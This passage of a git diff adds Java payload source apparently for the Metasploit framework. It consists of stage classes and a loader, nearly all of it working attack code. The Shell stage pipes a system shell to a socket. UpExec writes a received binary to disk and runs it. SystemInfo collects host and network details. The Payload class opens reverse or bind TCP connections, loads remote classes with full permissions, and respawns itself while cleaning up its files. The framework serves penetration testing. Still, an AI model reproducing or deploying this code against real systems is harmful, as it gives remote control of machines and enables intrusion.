+ * HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
+ * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
+ * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
+ * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
+ * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+package javapayload.stage;
+
+import java.io.DataInputStream;
+import java.io.OutputStream;
+
+public class Shell implements Stage {
+	public void start(DataInputStream in, OutputStream out, String[] parameters) throws Exception {
+		final String[] cmdarray = new String[1];
+		if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) {
+			cmdarray[0] = "cmd.exe";
+		} else {
+			cmdarray[0] = "/bin/sh";
+		}
+		final Process proc = Runtime.getRuntime().exec(cmdarray);
+		new StreamForwarder(in, proc.getOutputStream(), out).start();
+		new StreamForwarder(proc.getInputStream(), out, out).start();
+		new StreamForwarder(proc.getErrorStream(), out, out).start();
+		proc.waitFor();
+		in.close();
+		out.close();
+	}
+}
diff --git a/external/source/javapayload/src/javapayload/stage/Stage.java b/external/source/javapayload/src/javapayload/stage/Stage.java
new file mode 100644
index 0000000000..22084f72f0
--- /dev/null
+++ b/external/source/javapayload/src/javapayload/stage/Stage.java
@@ -0,0 +1,42 @@
+/*
+ * Java Payloads.
+ * 
+ * Copyright (c) 2010, Michael 'mihi' Schierl
+ * All rights reserved.
+ * 
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 
+ * - Redistributions of source code must retain the above copyright notice,
+ *   this list of conditions and the following disclaimer.
+ *   
+ * - Redistributions in binary form must reproduce the above copyright
+ *   notice, this list of conditions and the following disclaimer in the
+ *   documentation and/or other materials provided with the distribution.
+ *   
+ * - Neither name of the copyright holders nor the names of its
+ *   contributors may be used to endorse or promote products derived from
+ *   this software without specific prior written permission.
+ *   
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND THE CONTRIBUTORS
+ * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+ * HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
+ * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
+ * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
+ * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
+ * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+package javapayload.stage;
+
+import java.io.DataInputStream;
+import java.io.OutputStream;
+
+public interface Stage {
+	public abstract void start(DataInputStream in, OutputStream out, String[] parameters) throws Exception;
+}
diff --git a/external/source/javapayload/src/javapayload/stage/StreamForwarder.java b/external/source/javapayload/src/javapayload/stage/StreamForwarder.java
new file mode 100644
index 0000000000..9dbe19f1ae
--- /dev/null
+++ b/external/source/javapayload/src/javapayload/stage/StreamForwarder.java
@@ -0,0 +1,79 @@
+/*
+ * Java Payloads.
+ * 
+ * Copyright (c) 2010, Michael 'mihi' Schierl
+ * All rights reserved.
+ * 
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 
+ * - Redistributions of source code must retain the above copyright notice,
+ *   this list of conditions and the following disclaimer.
+ *   
+ * - Redistributions in binary form must reproduce the above copyright
+ *   notice, this list of conditions and the following disclaimer in the
+ *   documentation and/or other materials provided with the distribution.
+ *   
+ * - Neither name of the copyright holders nor the names of its
+ *   contributors may be used to endorse or promote products derived from
+ *   this software without specific prior written permission.
+ *   
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND THE CONTRIBUTORS
+ * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+ * HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
+ * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
+ * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
+ * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
+ * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+package javapayload.stage;
+
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.io.PrintStream;
+
+public class StreamForwarder extends Thread {
+	public static void forward(InputStream in, OutputStream out) throws IOException {
+		try {
+			final byte[] buf = new byte[4096];
+			int length;
+			while ((length = in.read(buf)) != -1) {
+				if (out != null) {
+					out.write(buf, 0, length);
+					if (in.available() == 0) {
+						out.flush();
+					}
+				}
+			}
+		} finally {
+			in.close();
+			out.close();
+		}
+	}
+
+	private final InputStream in;
+	private final OutputStream out;
+
+	private final OutputStream stackTraceOut;
+
+	public StreamForwarder(InputStream in, OutputStream out, OutputStream stackTraceOut) {
+		this.in = in;
+		this.out = out;
+		this.stackTraceOut = stackTraceOut;
+	}
+
+	public void run() {
+		try {
+			forward(in, out);
+		} catch (final Throwable ex) {
+			ex.printStackTrace(new PrintStream(stackTraceOut));
+		}
+	}
+}
diff --git a/external/source/javapayload/src/javapayload/stage/SystemInfo.java b/external/source/javapayload/src/javapayload/stage/SystemInfo.java
new file mode 100644
index 0000000000..da494ef96d
--- /dev/null
+++ b/external/source/javapayload/src/javapayload/stage/SystemInfo.java
@@ -0,0 +1,92 @@
+/*
+ * Java Payloads.
+ * 
+ * Copyright (c) 2010, Michael 'mihi' Schierl
+ * All rights reserved.
+ * 
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 
+ * - Redistributions of source code must retain the above copyright notice,
+ *   this list of conditions and the following disclaimer.
+ *   
+ * - Redistributions in binary form must reproduce the above copyright
+ *   notice, this list of conditions and the following disclaimer in the
+ *   documentation and/or other materials provided with the distribution.
+ *   
+ * - Neither name of the copyright holders nor the names of its
+ *   contributors may be used to endorse or promote products derived from
+ *   this software without specific prior written permission.
+ *   
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND THE CONTRIBUTORS
+ * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+ * HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
+ * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
+ * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
+ * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
+ * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+package javapayload.stage;
+
+import java.io.BufferedReader;
+import java.io.DataInputStream;
+import java.io.InputStreamReader;
+import java.io.OutputStream;
+import java.io.PrintStream;
+import java.net.InetAddress;
+import java.net.NetworkInterface;
+import java.net.URL;
+import java.util.Enumeration;
+
+public class SystemInfo implements Stage {
+
+	public void start(DataInputStream in, OutputStream out, String[] parameters) throws Exception {
+		PrintStream pout = new PrintStream(out, true);
+		pout.println("System properties:");
+		pout.println("~~~~~~~~~~~~~~~~~~");		
+		for (final Enumeration e = System.getProperties().propertyNames(); e.hasMoreElements(); ) {
+			final String property = (String) e.nextElement();
+			pout.println(property + "=" + System.getProperty(property));
+		}
+		pout.println();
+		pout.println("Local address:");
+		pout.println("~~~~~~~~~~~~~~");
+		InetAddress addr = InetAddress.getLocalHost();
+		pout.println("Name: "+addr.getHostName());
+		pout.println("Canonical Name: "+addr.getCanonicalHostName());
+		pout.println("IP Address: "+addr.getHostAddress());
+		pout.println();
+		pout.println("Network interfaces:");
+		pout.println("~~~~~~~~~~~~~~~~~~~");
+		for(final Enumeration e = NetworkInterface.getNetworkInterfaces(); e.hasMoreElements(); ) {
+			NetworkInterface iface = (NetworkInterface) e.nextElement();
+			pout.println(iface.getName());
+			pout.println("  Display Name: "+iface.getDisplayName());
+			for (final Enumeration e2 = iface.getInetAddresses(); e2.hasMoreElements(); ) {
+				InetAddress ifaddr = (InetAddress) e2.nextElement();
+				pout.println("    Address:");
+				pout.println("      Name: "+ifaddr.getHostName());
+				pout.println("      Canonical Name: "+ifaddr.getCanonicalHostName());
+				pout.println("      IP Address: "+ifaddr.getHostAddress());
+			}
+		}
+		pout.println();
+		pout.println("External IP Address:");
+		pout.println("~~~~~~~~~~~~~~~~~~~~");
+		try {
+			BufferedReader br = new BufferedReader(new InputStreamReader(new URL("http://www.ippages.com/simple/").openStream()));
+			pout.println(br.readLine());
+			br.close();
+		} catch (Exception ex) {
+			ex.printStackTrace(pout);
+		}
+		pout.println();
+		pout.close();
+	}
+}
diff --git a/external/source/javapayload/src/javapayload/stage/UpExec.java b/external/source/javapayload/src/javapayload/stage/UpExec.java
new file mode 100644
index 0000000000..55f6696f1e
--- /dev/null
+++ b/external/source/javapayload/src/javapayload/stage/UpExec.java
@@ -0,0 +1,71 @@
+/*
+ * Java Payloads.
+ * 
+ * Copyright (c) 2010, Michael 'mihi' Schierl
+ * All rights reserved.
+ * 
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 
+ * - Redistributions of source code must retain the above copyright notice,
+ *   this list of conditions and the following disclaimer.
+ *   
+ * - Redistributions in binary form must reproduce the above copyright
+ *   notice, this list of conditions and the following disclaimer in the
+ *   documentation and/or other materials provided with the distribution.
+ *   
+ * - Neither name of the copyright holders nor the names of its
+ *   contributors may be used to endorse or promote products derived from
+ *   this software without specific prior written permission.
+ *   
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND THE CONTRIBUTORS
+ * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+ * HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
+ * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
+ * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
+ * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
+ * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+package javapayload.stage;
+
+import java.io.DataInputStream;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.OutputStream;
+
+public class UpExec implements Stage {
+
+	public void start(DataInputStream in, OutputStream out, String[] parameters) throws Exception {
+		final String tempfile = File.createTempFile("~upexec", null).getAbsolutePath();
+		final int length = in.readInt();
+		final byte[] data = new byte[length];
+		in.readFully(data);
+		final FileOutputStream fos = new FileOutputStream(tempfile);
+		fos.write(data);
+		fos.close();
+		for (int i = 0; i < parameters.length; i++) {
+			if (parameters[i].equals("--")) {
+				// separator found. The next parameter will be the module name, and
+				// all remaining parameters are for exec.
+				final String[] cmdarray = new String[parameters.length - i - 2];
+				System.arraycopy(parameters, i + 2, cmdarray, 0, cmdarray.length);
+				cmdarray[0] = tempfile;
+				final Process proc = Runtime.getRuntime().exec(cmdarray);
+				new StreamForwarder(in, proc.getOutputStream(), out).start();
+				new StreamForwarder(proc.getInputStream(), out, out).start();
+				new StreamForwarder(proc.getErrorStream(), out, out).start();
+				proc.waitFor();
+				in.close();
+				out.close();
+				break;
+			}
+		}
+		new File(tempfile).delete();
+	}
+}
diff --git a/external/source/javapayload/src/metasploit/Payload.java b/external/source/javapayload/src/metasploit/Payload.java
new file mode 100644
index 0000000000..3ec39e155e
--- /dev/null
+++ b/external/source/javapayload/src/metasploit/Payload.java
@@ -0,0 +1,308 @@
+/*
+ * Java Payloads loader class for Metasploit.
+ * 
+ * Copyright (c) 2010, Michael 'mihi' Schierl
+ * All rights reserved.
+ * 
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 
+ * - Redistributions of source code must retain the above copyright notice,
+ *   this list of conditions and the following disclaimer.
+ *   
+ * - Redistributions in binary form must reproduce the above copyright
+ *   notice, this list of conditions and the following disclaimer in the
+ *   documentation and/or other materials provided with the distribution.
+ *   
+ * - Neither name of the copyright holders nor the names of its
+ *   contributors may be used to endorse or promote products derived from
+ *   this software without specific prior written permission.
+ *   
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND THE CONTRIBUTORS
+ * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+ * HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
+ * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
+ * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
+ * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
+ * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+package metasploit;
+
+import java.io.DataInputStream;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.io.PrintStream;
+import java.net.ServerSocket;
+import java.net.Socket;
+import java.net.URL;
+import java.security.AllPermission;
+import java.security.CodeSource;
+import java.security.Permissions;
+import java.security.ProtectionDomain;
+import java.security.cert.Certificate;
+import java.util.Locale;
+import java.util.Properties;
+import java.util.Stack;
+import java.util.StringTokenizer;
+
+/**
+ * The main payload loader class. 
+ * 
+ * To invoke all the magic, call the {@link #main(String[])} method
+ * (Or use it as Main-Class in a standalone jar and double-click it).
+ */
+public class Payload extends ClassLoader {
+
+	public static void main(String[] ignored) throws Exception {
+		// Find our properties. If we are running inside the jar, they are in a resource stream called "/metasploit.dat".
+		Properties props = new Properties();
+		Class clazz = Payload.class;
+		String clazzFile = clazz.getName().replace('.', '/')+".class";
+		InputStream propsStream = clazz.getResourceAsStream("/metasploit.dat");
+		if (propsStream != null) {
+			props.load(propsStream);
+			propsStream.close();
+		}
+		
+		// check if we should respawn
+		int spawn = Integer.parseInt(props.getProperty("Spawn", "0"));
+		if (spawn > 0) {
+			// decrease count so that eventually the process
+			// will stop spawning
+			props.setProperty("Spawn", String.valueOf(spawn - 1));
+			// write our class
+			File dummyTempFile = File.createTempFile("~spawn", ".tmp");
+			dummyTempFile.delete();
+			File tempDir = new File(dummyTempFile.getAbsolutePath()+".dir");
+			File propFile = new File(tempDir, "metasploit.dat");
+			File classFile = new File(tempDir, clazzFile);
+			classFile.getParentFile().mkdirs();
+			// load ourselves via the class loader (works both on disk and from Jar)
+			InputStream in = clazz.getResourceAsStream("/"+clazzFile);
+			FileOutputStream fos = new FileOutputStream(classFile);
+			byte[] buf = new byte[4096];
+			int len;
+			while ((len = in.read(buf)) != -1) {
+				fos.write(buf,0,len);
+			}
+			fos.close();
+			fos = new FileOutputStream(propFile);
+			props.store(fos, "");
+			fos.close();
+			Process proc = Runtime.getRuntime().exec(new String[] {
+					getJreExecutable("java"),
+					"-classpath",
+					tempDir.getAbsolutePath(),
+					clazz.getName()
+			});
+			// the input streams might cause the child process to block if 
+			// we do not read or close them
+			proc.getInputStream().close();
+			proc.getErrorStream().close();
+			
+			// give the process plenty of time to load the class if needed
+			Thread.sleep(2000);
+			
+			// clean up (we can even delete the .class file on Windows
+			// if the process is still running). Note that delete()
+			// will only delete empty directories, so we have to delete
+			// everything else first
+			File[] files = new File[] {
+					classFile, classFile.getParentFile(), propFile, tempDir
+			};
+			for (int i = 0; i < files.length; i++) {
+				for (int j = 0; j < 10; j++) {
+					if (files[i].delete())
+						break;
+					files[i].deleteOnExit();
+					Thread.sleep(100);
+				}
+			}
+		} else {
+			// check what stager to use (bind/reverse)
+			int lPort = Integer.parseInt(props.getProperty("LPORT", "4444"));
+			String lHost = props.getProperty("LHOST", null);
+			InputStream in;
+			OutputStream out;
+			if (lPort <= 0) { 
+				// debug code: just connect to stdin/stdout
+				// best used with embedded stages
+				in = System.in;
+				out = System.out;			
+			} else {
+				Socket socket;
+				if (lHost != null) {
+					// reverse_tcp
+					socket = new Socket(lHost, lPort);
+				} else {
+					// bind_tcp
+					ServerSocket serverSocket = new ServerSocket(lPort);
+					socket = serverSocket.accept();
+					serverSocket.close(); // no need to listen any longer
+				}
+				in = socket.getInputStream();
+				out = socket.getOutputStream();
+			}
+			
+			// build the stage parameters, if any
+			StringTokenizer stageParamTokenizer = new StringTokenizer("Payload -- "+props.getProperty("StageParameters", ""), " ");
+			String[] stageParams = new String[stageParamTokenizer.countTokens()];
+			for (int i = 0; i < stageParams.length; i++) {
+				stageParams[i] = stageParamTokenizer.nextToken();
+			}
+			new Payload().bootstrap(in, out, props.getProperty("EmbeddedStage", null),stageParams);
+		}
+	}
+	
+	private final void bootstrap(InputStream rawIn, OutputStream out, String embeddedStageName, String[] stageParameters) throws Exception {
+		try {
+			final DataInputStream in = new DataInputStream(rawIn);
+			Class clazz;
+			final Permissions permissions = new Permissions();
+			permissions.add(new AllPermission());
+			final ProtectionDomain pd = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), permissions);
+			if (embeddedStageName == null) {
+				int length = in.readInt();
+				do {
+					final byte[] classfile = new byte[length];
+					in.readFully(classfile);
+					resolveClass(clazz = defineClass(null, classfile, 0, length, pd));
+					length = in.readInt();
+				} while (length > 0);
+			} else {
+				clazz = Class.forName("javapayload.stage."+embeddedStageName);
+			}
+			final Object stage = clazz.newInstance();
+			clazz.getMethod("start", new Class[] { DataInputStream.class, OutputStream.class, String[].class }).invoke(stage, new Object[] { in, out, stageParameters });
+		} catch (final Throwable t) {
+			t.printStackTrace(new PrintStream(out));
+		}
+	}	
+	
+	///
+	/// The rest of the file is based on code from Apache Ant 1.8.1
+	///
+    private static final String OS_NAME = System.getProperty("os.name").toLowerCase(Locale.ENGLISH);
+    private static final String PATH_SEP = System.getProperty("path.separator");
+    
+    private static final boolean IS_AIX = "aix".equals(OS_NAME);
+    private static final boolean IS_DOS = PATH_SEP.equals(";");
+    private static final String JAVA_HOME = System.getProperty("java.home");
+
+    private static String getJreExecutable(String command) {
+        File jExecutable = null;
+
+        if (IS_AIX) {
+            // On IBM's JDK 1.2 the directory layout is different, 1.3 follows
+            // Sun's layout.
+            jExecutable = findInDir(JAVA_HOME + "/sh", command);
+        }
+
+        if (jExecutable == null) {
+            jExecutable = findInDir(JAVA_HOME + "/bin", command);
+        }
+
+        if (jExecutable != null) {
+            return jExecutable.getAbsolutePath();
+        } else {
+            // Unfortunately on Windows java.home doesn't always refer
+            // to the correct location, so we need to fall back to
+            // assuming java is somewhere on the PATH.
+            return addExtension(command);
+        }
+    }
+
+    private static String addExtension(String command) {
+        // This is the most common extension case - exe for windows and OS/2,
+        // nothing for *nix.
+        return command + (IS_DOS ? ".exe" : "");
+    }
+
+    private static File findInDir(String dirName, String commandName) {
+        File dir = normalize(dirName);
+        File executable = null;
+        if (dir.exists()) {
+            executable = new File(dir, addExtension(commandName));
+            if (!executable.exists()) {
+                executable = null;
+            }
+        }
+        return executable;
+    }
+
+    private static File normalize(final String path) {
+        Stack s = new Stack();
+        String[] dissect = dissect(path);
+        s.push(dissect[0]);
+
+        StringTokenizer tok = new StringTokenizer(dissect[1], File.separator);
+        while (tok.hasMoreTokens()) {
+            String thisToken = tok.nextToken();
+            if (".".equals(thisToken)) {
+                continue;
+            }
+            if ("..".equals(thisToken)) {
+                if (s.size() < 2) {
+                    // Cannot resolve it, so skip it.
+                    return new File(path);
+                }
+                s.pop();
+            } else { // plain component
+                s.push(thisToken);
+            }
+        }
+        StringBuffer sb = new StringBuffer();
+        for (int i = 0; i < s.size(); i++) {
+            if (i > 1) {
+                // not before the filesystem root and not after it, since root
+                // already contains one
+                sb.append(File.separatorChar);
+            }
+            sb.append(s.elementAt(i));
+        }
+        return new File(sb.toString());
+    }
+    
+    private static String[] dissect(String path) {
+        char sep = File.separatorChar;
+        path = path.replace('/', sep).replace('\\', sep);
+        // make sure we are dealing with an absolute path
+        String root = null;
+        int colon = path.indexOf(':');
+        if (colon > 0 && IS_DOS) {
+
+            int next = colon + 1;
+            root = path.substring(0, next);
+            char[] ca = path.toCharArray();
+            root += sep;
+            //remove the initial separator; the root has it.
+            next = (ca[next] == sep) ? next + 1 : next;
+
+            StringBuffer sbPath = new StringBuffer();
+            // Eliminate consecutive slashes after the drive spec:
+            for (int i = next; i < ca.length; i++) {
+                if (ca[i] != sep || ca[i - 1] != sep) {
+                    sbPath.append(ca[i]);
+                }
+            }
+            path = sbPath.toString();
+        } else if (path.length() > 1 && path.charAt(1) == sep) {
+            // UNC drive
+            int nextsep = path.indexOf(sep, 2);
+            nextsep = path.indexOf(sep, nextsep + 1);
+            root = (nextsep > 2) ? path.substring(0, nextsep + 1) : path;
+            path = path.substring(root.length());
+        } else {
+            root = File.separator;
+            path = path.substring(1);
+        }
+        return new String[] {root, path};
+    }
+}
\ No newline at end of file